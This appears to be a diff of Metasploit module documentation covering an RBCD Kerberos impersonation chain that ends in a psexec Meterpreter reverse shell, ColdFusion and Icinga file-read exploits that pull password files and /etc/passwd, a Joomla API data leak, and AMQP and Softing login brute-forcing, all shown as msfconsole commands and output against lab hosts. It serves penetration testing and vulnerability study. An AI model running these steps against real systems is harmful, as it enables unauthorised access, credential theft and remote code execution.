+   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/ldap/rbcd` can be used:

 1. Set the `RHOST` value to a target domain controller
-2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+2. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
 3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
 4. Use the `WRITE` action to configure the target for RBCD

+See the Scenarios for a more detailed walk through
+
 ## Actions

 ### FLUSH
@@ -42,13 +111,16 @@ the delegation target.
 ## Scenarios

 ### Window Server 2019 Domain Controller
+
 In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
-used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+used to add a new computer account to the domain, then configures `WS01$` for delegation from the new computer account.

 The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
 with the Service for User (S4U) Kerberos extension.

-```
+First create the computer account:
+
+```msf
 msf6 auxiliary(admin/dcerpc/samr_computer) > show options

 Module options (auxiliary/admin/dcerpc/samr_computer):
@@ -86,9 +158,14 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+```
+
+Now use the RBCD module to read the the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
+
+```msf
+msf6 auxiliary(admin/ldap/rbcd) > set USERNAME sandy@msflab.local
 BIND_DN => sandy@msflab.local
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set PASSWORD Password1!
 BIND_PW => Password1!
 msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -102,6 +179,11 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
 [*] Auxiliary module execution completed
+```
+
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
 DELEGATE_FROM => DESKTOP-QLSTR9NW$
 msf6 auxiliary(admin/ldap/rbcd) > write
@@ -112,6 +194,11 @@ msf6 auxiliary(admin/ldap/rbcd) > write
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
 [*] Auxiliary module execution completed
+```
+
+Reading the value of `msDS-AllowedToActOnBehalfOfOtherIdentity` to verify the value is updated:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Running module against 192.168.159.10

@@ -123,3 +210,38 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/ldap/rbcd) >
 ```
+
+Next we can use the `auxiliary/admin/kerberos/get_ticket` module to request a new S4U impersonation ticket for the Administrator
+account using the previously created machine account. For instance requesting a service ticket for SMB access:
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=192.168.159.10 username=DESKTOP-QLSTR9NW password=A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT domain=msflab.local spn=cifs/ws01.msflab.local impersonate=Administrator
+[*] Running module against 192.168.159.10
+
+[+] 192.168.159.10:88 - Received a valid TGT-Response
+[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_533930.bin
+[*] 192.168.159.10:88 - Getting TGS impersonating Administrator@msflab.local (SPN: cifs/ws01.msflab.local)
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_962080.bin
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] Auxiliary module execution completed
+```
+
+The saved TGS can be used in a pass-the-ticket style attack. For instance using the `exploit/windows/smb/psexec` module for a reverse shell:
+
+```msf
+msf6 exploit(windows/smb/psexec) > run lhost=192.168.123.1 rhost=192.168.159.10 username=Administrator smb::auth=kerberos smb::rhostname=ws01.msflab.local domaincontrollerrhost=192.168.159.10 smbdomain=msflab.local smb::krb5ccname=/Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.159.10:445 - Connecting to the server...
+[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'Administrator'...
+[*] 192.168.159.10:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] 192.168.159.10:445 - Selecting PowerShell target
+[*] 192.168.159.10:445 - Executing the payload...
+[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.159.10
+[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.159.10:60755) at 2023-02-22 10:00:01 +0000
+
+meterpreter >
+```
@@ -0,0 +1,80 @@
+## Vulnerable Application
+This module leverages an unauthenticated arbitrary file read vulnerability due to deserialization of untrusted data
+in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update
+15 and earlier. For a full technical analysis of the vulnerability read the
+[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis).
+
+## Options
+To successfully read back the contents of an arbitrary file, you must set the modules `CFC_ENDPOINT` option to a valid
+ColdFusion Component (CFC) endpoint on the target server. You must also set the `CFC_ENDPOINT` option to the name of a
+remote method from that `CFC_ENDPOINT`. While the vulnerability is triggered regardless of remote method begin invoked,
+in order for ColdFusion to emit the `TARGETFILE` contents in the HTTP response, the remote method invoked must return
+a result. If the CFC_METHOD requires parameters, they can be provided via the `CFC_METHOD_PARAMETERS` option. By default
+a CFC endpoint and method from the ColdFusion Administrator (CFIDE) are provided, which is accessible in many but not
+all configurations.
+
+## Testing
+To setup a test environment, the following steps can be performed.
+1. Setup a Windows Server 2022 VM.
+2. Download the [ColdFusion 2021
+Update 5](https://cfdownload.adobe.com/pub/adobe/coldfusion/2021/cfinstaller/cf2021u5/ColdFusion_2021_GUI_WWEJ_win64.exe)
+installer and install it.
+3. Configure the ColdFusion server for production use and enable the Secure Profile during setup.
+4. If the default CFIDE endpoints are not accessible (e.g. The server is configured with a Secure profile), install a 
+web application on top of ColdFusion in order to expose CFC endpoints. Alternatively, create a test CFC endpoint
+called `testing.cfc` in the `wwwroot` folder with the following contents:
+```
+component testing {
+	
+	remote String function foo()  { 
+
+		return "Hello from foo";
+	}
+}
+```
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set CFC_ENDPOINT /testing.cfc`
+5. `set CFC_METHOD foo`
+6. Optionally `set CFC_METHOD_PARAMETERS param1=foo, param2=bar` if the CFC_METHOD requires parameters.
+7. `set TARGETFILE ../lib/password.properties`
+8. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+9. `run`
+
+## Scenarios
+### Adobe ColdFusion 2021 Update 5 on Windows Server 2022
+```
+msf6 auxiliary(gather/adobe_coldfusion_fileread_cve_2023_26360) > show options
+
+Module options (auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360):
+
+   Name                   Current Setting             Required  Description
+   ----                   ---------------             --------  -----------
+   CFC_ENDPOINT           /testing.cfc                yes       The target ColdFusion Component (CFC) endpoint
+   CFC_METHOD             foo                         yes       The target ColdFusion Component (CFC) remote method name
+   CFC_METHOD_PARAMETERS                              no        The target ColdFusion Component (CFC) remote method parameters
+                                                                 (e.g. "param1=foo, param2=bar")
+   Proxies                                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                 172.23.13.12                yes       The target host(s), see https://docs.metasploit.com/docs/using
+                                                                -metasploit/basics/using-metasploit.html
+   RPORT                  8500                        yes       The target port (TCP)
+   SSL                    false                       no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT             false                       no        Store the target file as loot
+   TARGETFILE             ../lib/password.properties  yes       The target file to read, relative to the wwwroot folder.
+   VHOST                                              no        HTTP server virtual host
+
+msf6 auxiliary(gather/adobe_coldfusion_fileread_cve_2023_26360) > run
+[*] Running module against 172.23.13.12
+
+[*] #Tue Mar 28 01:33:23 PDT 2023
+password=30160D97731079B7ACCF7BCFAD049FCCCA3F855318037AC09DC00FFD52A29F5C
+rdspassword=
+encrypted=true
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/adobe_coldfusion_fileread_cve_2023_26360) > 
+```
@@ -0,0 +1,98 @@
+## Vulnerable Application
+
+This module will test AMQP logins on a range of machines and report successful logins.  If you have loaded a database
+plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+## Verification Steps
+
+1. Install RabbitMQ and start it
+   1. To use Docker, run: `docker run --rm -it --hostname "$(hostname)" -p 15672:15672 -p 5672:5672 rabbitmq:3-management`
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/amqp/amqp_login`
+4. Do: `set rhosts`
+5. Do: set usernames and passwords via any of the available options
+6. Do: `run`
+
+## Options
+
+### BLANK_PASSWORD
+
+Boolean value on if an additional login attempt should be attempted with an empty password for every user.
+
+### PASSWORD
+
+Password to try for each user.
+
+### PASS_FILE
+
+A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
+
+### STOP_ON_SUCCESS
+
+If a valid login is found on a host, immediately stop attempting additional logins on that host.
+
+### USERNAME
+
+Username to try for each password.
+
+### USERPASS_FILE
+
+A file containing a username and password, separated by a space, on every line. An example line would be `username
+password`.
+
+### USER_AS_PASS
+
+Boolean value on if an additional login attempt should be attempted with the password as the username.
+
+### USER_FILE
+
+A file containing a username on every line.
+
+### VERBOSE
+
+Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed
+attempt will look similar to the following:
+
+```
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+```
+
+## Option Combinations
+
+It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password
+could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or
+`BLANK_PASSWORDS`. This module makes a combination of all of the above when attempting logins. So if a password is set
+in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
+
+## Scenarios
+### RabbitMQ 3.11.10 on Docker
+
+The Docker container listens on 5672/tcp without SSL. There's also an administrative site running on 15672/tcp where
+users can be added. The default credentials to login are `guest` / `guest`. A new `admin` account was added for this
+example.
+
+```
+msf6 > use auxiliary/scanner/amqp/amqp_login 
+msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
+PASS_FILE => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
+RPORT => 5672
+msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 auxiliary(scanner/amqp/amqp_login) > run
+
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[+] 192.168.159.128:5672 - Login Successful: admin:password
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/amqp/amqp_login) > 
+```
@@ -0,0 +1,55 @@
+## Description
+
+This module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers. Per the
+specification, the "server-properties":
+
+> ... SHOULD contain at least these fields: "host", specifying the server host name or address, "product", giving the
+> name of the server product, "version", giving the name of the server version, "platform", giving the name of the
+> operating system, "copyright", if appropriate, and "information", giving other general information.
+
+*See: https://www.rabbitmq.com/amqp-0-9-1-reference.html#connection.start.server-properties*
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/amqp/amqp_version`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set RPORT [PORT]`
+4. Do: `run`
+
+## Scenarios
+
+**Running the scanner**
+
+```
+msf6 > use auxiliary/scanner/amqp/amqp_version
+msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
+RHOSTS => 192.168.159.0/24
+msf6 auxiliary(scanner/amqp/amqp_version) > run
+
+[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
+[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
+[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
+[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
+[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
+[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
+[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
+[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
+[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
+[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
+[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
+[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/amqp/amqp_version) > services 
+Services
+========
+
+host             port  proto  name   state  info
+----             ----  -----  ----   -----  ----
+192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
+                                            AIN)
+192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
+
+msf6 auxiliary(scanner/amqp/amqp_version) 
+```
+
+[1]: https://www.rabbitmq.com/amqp-0-9-1-reference.html#connection.start.server-properties
@@ -2,7 +2,35 @@

 Apache CouchDB is a nosql database server which communicates over HTTP.  This module will enumerate the server and databases hosted on it.

-The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https://www.1and1.com/cloud-community/learn/database/couchdb/install-and-use-couchdb-on-ubuntu-1604/):
+### Docker setup
+  1. `docker run -p 5984:5984 --env COUCHDB_USER=admin --env COUCHDB_PASSWORD=password apache/couchdb:3.3.1`
+     After running this command you will see the server is returning errors, to resolve this we must run some cURL commands.
+
+  2. In another window, after startup, run the following three cURL commands:
+   ```
+   $ curl localhost:5984
+   {"couchdb":"Welcome","version":"2.1.1","features":["scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
+   ```
+   ```
+   $ curl -X PUT http://admin:password@localhost:5984/_users
+   {"ok":true}
+   ```
+   ```
+   $ curl -X PUT http://admin:password@localhost:5984/_replicator
+   {"ok":true}
+   ```
+   ```
+   $ curl -X PUT http://admin:password@localhost:5984/_global_changes
+   {"ok":true}
+   ```
+
+  After running these commands you should get the following response when accessing http://localhost:5984/.
+   ```
+  {"couchdb":"Welcome","version":"3.3.1","git_sha":"1fd50b82a","uuid":"bb8a05afa55cd9407a9532d05de65736","features":["access-ready","partitioned","pluggable-storage-engines","reshard","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
+  ```
+
+### Ubuntu 16.04 Setup
+The following was done on Ubuntu 16.04, and is largely based on [1and1.com](https://www.1and1.com/cloud-community/learn/database/couchdb/install-and-use-couchdb-on-ubuntu-1604/):
  
  1. `sudo apt install software-properties-common`
  2. `sudo add-apt-repository ppa:couchdb/stable`
@@ -0,0 +1,83 @@
+## Vulnerable Application
+
+Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
+unauthenticated directory traversal vulnerability. The vulnerability is triggered
+through the icinga-php-thirdparty library, which allows unauthenticated users
+to retrieve arbitrary files from the targets filesystem via a GET request to
+`/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>` as the user
+running the Icingaweb server, which will typically be the `www-data` user.
+
+This can then be used to retrieve sensitive configuration information from the target
+such as the configuration of various services, which may reveal sensitive login or configuration information,
+the `/etc/passwd` file to get a list of valid usernames for password guessing attacks, or other sensitive files
+which may exist as part of additional functionality available on the target server.
+
+This module was tested against Icingaweb 2.9.5 running on Docker.
+
+## Install Icingaweb 2.9.5 on a Ubuntu 22.04 Docker Image
+
+```
+sudo apt-get install docker.io -y
+sudo docker run -p 8080:8080 icinga/icingaweb2:2.9.5
+```
+
+Browse to port 8080 to confirm the site loads. No need to configure.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/icinga_static_library_file_directory_traversal`
+4. Do: `set rhosts [ip]`
+5. Do: `set file [file]`. On Docker use `/etc/passwd` for testing purposes.
+6. Do: `run`
+7. You should be able to retrieve a file
+
+## Options
+
+## Scenarios
+
+### Icingaweb 2.9.5 on Ubuntu 22.04 running on Docker
+
+```
+[*] Processing icinga.rb for ERB directives.
+resource (icinga.rb)> use scanner/http/icinga_static_library_file_directory_traversal
+resource (icinga.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (icinga.rb)> set file /etc/passwd
+file => /etc/passwd
+resource (icinga.rb)> check
+[*] 127.0.0.1:8080 - The service is running, but could not be validated. 127.0.0.1:8080     - Icinga Web 2 found, unable to determine version.
+resource (icinga.rb)> run
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+
+[+] /etc/passwd saved to /root/.msf4/loot/20230421161654_default_127.0.0.1_icingafile_070863.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (icinga.rb)> loot
+
+Loot
+====
+
+host          service  type         name         content     info  path
+----          -------  ----         ----         -------     ----  ----
+127.000.0.01           icinga file  /etc/passwd  text/plain        /root/.msf4/loot/20230421161654_default_127.0.0.1_icingafile_070863.txt
+```
@@ -0,0 +1,77 @@
+
+## Vulnerable Application
+
+Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
+This vulnerability allows unauthenticated users access to webservice endpoints which contain
+sensitive information. Specifically for this module we exploit the users and config/application
+endpoints.
+
+This module was tested against Joomla 4.2.7 running on Docker.
+
+## Install Joomla on Ubuntu 22.04
+
+From https://www.techrepublic.com/article/how-to-deploy-joomla-docker/
+```
+sudo apt-get install docker.io -y
+sudo docker network create joomla-network
+sudo docker pull mysql:5.7
+sudo docker pull joomla:4.2.7-php8.1-apache
+sudo docker volume create mysql-data
+sudo docker run -d --name joomladb  -v mysql-data:/var/lib/mysql --network joomla-network -e "MYSQL_ROOT_PASSWORD=PWORD" -e MYSQL_USER=joomla -e "MYSQL_PASSWORD=PWORD" -e "MYSQL_DATABASE=joomla" mysql:5.7
+sudo docker volume create joomla-data
+sudo docker run -d --name joomla -p 80:80 -v joomla-data:/var/www/html --network joomla-network -e JOOMLA_DB_HOST=joomladb -e JOOMLA_DB_USER=joomla -e JOOMLA_DB_PASSWORD=PWORD joomla
+```
+
+Browse to port 80, and finish the installation
+
+## Verification Steps
+
+1. Install the application, and finish the configuration
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/joomla_api_improper_access_checks`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get sensitive information about the users and configuration
+
+## Scenarios
+
+### Version 4.2.7 from Docker
+
+```
+└─$ ./msfconsole -qr joomla_improper.rb
+[*] Processing joomla_improper.rb for ERB directives.
+resource (joomla_improper.rb)> use auxiliary/scanner/http/joomla_api_improper_access_checks
+resource (joomla_improper.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (joomla_improper.rb)> set verbose true
+verbose => true
+resource (joomla_improper.rb)> run
+[*] Joomla version detected: 4.2.7
+[+] Joomla version 4.2.7 is vulnerable
+[*] Attempting user enumeration
+[+] Users JSON saved to /root/.msf4/loot/20230416225106_default_1.1.1.1_joomla_users_jso_345565.json
+[+] Joomla Users
+============
+
+ ID   Super User  Name    Username  Email          Send Email  Register Date        Last Visit Date  Group Names
+ --   ----------  ----    --------  -----          ----------  -------------        ---------------  -----------
+ 400  *           joomla  joomla    none@none.com  1           2023-04-16 23:07:42                   Super Users
+
+[*] Attempting config enumeration
+[+] Config JSON saved to /root/.msf4/loot/20230416225106_default_1.1.1.1_joomla_config_js_812393.json
+[+] Joomla Config
+=============
+
+ Setting      Value
+ -------      -----
+ db host      joomladb3
+ db name      joomla_db
+ db password  PWORD
+ db prefix    l57cr_
+ db prefix    0
+ db user      root
+ dbtype       mysqli
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,182 @@
+## Description
+
+This module allows you to authenticate to Softing Secure Integration Server.
+
+By default:
+* Credentials are `admin:admin`.
+* HTTP is TCP/8099 and HTTPS is TCP/443. Either one can be used, but the module defaults to TCP/8099.
+
+There does not seem to be a limit to the number of times login attempts can be made.
+
+## Vulnerable Application
+
+This module was tested against version 1.22, installed on Windows Server 2019 Standard x64.
+
+*1.22 Download*
+
+https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/http/softing_sis_login`
+3. Do: `set RHOSTS <target_ip>` OR `set RHOSTS file:/path/to/targets/file` if against several targets
+4. Do: Optional: `set SSL true` if necessary
+5. Do: Optional: `set RPORT 443` if SSL is set
+6. Do: `set USERNAME <username>` if necessary. Default is `admin`
+7. Do: `set PASSWORD <password>` if necessary. Default is `admin`
+8. Do: `run`
+
+If running against several usernames: `set USER_FILE /path/to/usernames_file`
+If using a wordlist (e.g. common passwords): `set PASS_FILE /path/to/passwords_file`
+
+`USER_FILE` and `PASS_FILE` take priority over `USERNAME` and `PASSWORD`.
+
+A `username:password` pair of credentials can be provided by doing `set USERPASS_FILE /path/to/userpass_file`.
+
+## Scenarios
+### Default
+
+In this scenario, the default options were used.
+
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login 
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.119:8099 - Success: 'admin:admin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private  realm  private_type  JtR Format
+----            ------          -------          ------  -------  -----  ------------  ----------
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin           Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+### Different admin password, SSL in use
+
+In this scenario, the default password for the `admin` user has been changed, and SSL was used.
+
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login 
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 auxiliary(scanner/http/softing_sis_login) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 auxiliary(scanner/http/softing_sis_login) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(scanner/http/softing_sis_login) > set RPORT 443
+RPORT => 443
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.119:443 - Success: 'admin:admin123'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private  realm  private_type  JtR Format
+----            ------          -------          ------  -------  -----  ------------  ----------
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin           Password      
+192.168.50.119  192.168.50.119  443/tcp (https)  admin   admin123        Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+### Several targets, using different usernames and passwords
+
+In this scenario, we have several targets that have different usernames and passwords for each.
+All the targets have the Softing Secure Integration Server login page enabled at TCP/8099.
+
+Contents of `usernames.txt`:
+```
+admin
+admin1
+user
+lowpriv
+guest
+```
+
+Contents of `passwords.txt`:
+```
+admin
+admin123
+BadPass
+GoodPass?
+P@ssw0rd
+user
+pass
+password
+lowpriv
+```
+
+Contents of `targets.txt`:
+```
+192.168.50.71
+192.168.50.119
+192.168.50.206
+```
+
+Module output:
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS file:/home/ubuntu/Documents/targets.txt
+RHOSTS => file:/home/ubuntu/Documents/targets.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set USER_FILE ~/Documents/usernames.txt
+USER_FILE => ~/Documents/usernames.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set PASS_FILE ~/Documents/passwords.txt
+PASS_FILE => ~/Documents/passwords.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.71:8099 - Success: 'admin:P@ssw0rd'
+[*] Scanned 1 of 3 hosts (33% complete)
+[+] 192.168.50.119:8099 - Success: 'admin:admin'
+[*] Scanned 2 of 3 hosts (66% complete)
+[+] 192.168.50.206:8099 - Success: 'admin:pass123'
+[+] 192.168.50.206:8099 - Success: 'admin1:admin123'
+[*] Scanned 3 of 3 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+Note that `VERBOSE` was set to `false` in this scenario to reduce amount of output on screen.
+By default, `VERBOSE` is set to true, which also outputs failed login attempts.
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private   realm  private_type  JtR Format
+----            ------          -------          ------  -------   -----  ------------  ----------
+192.168.50.71   192.168.50.71   8099/tcp (http)  admin   P@ssw0rd         Password      
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin            Password      
+192.168.50.206  192.168.50.206  8099/tcp (http)  admin   pass123          Password      
+192.168.50.206  192.168.50.206  8099/tcp (http)  admin1  admin123         Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
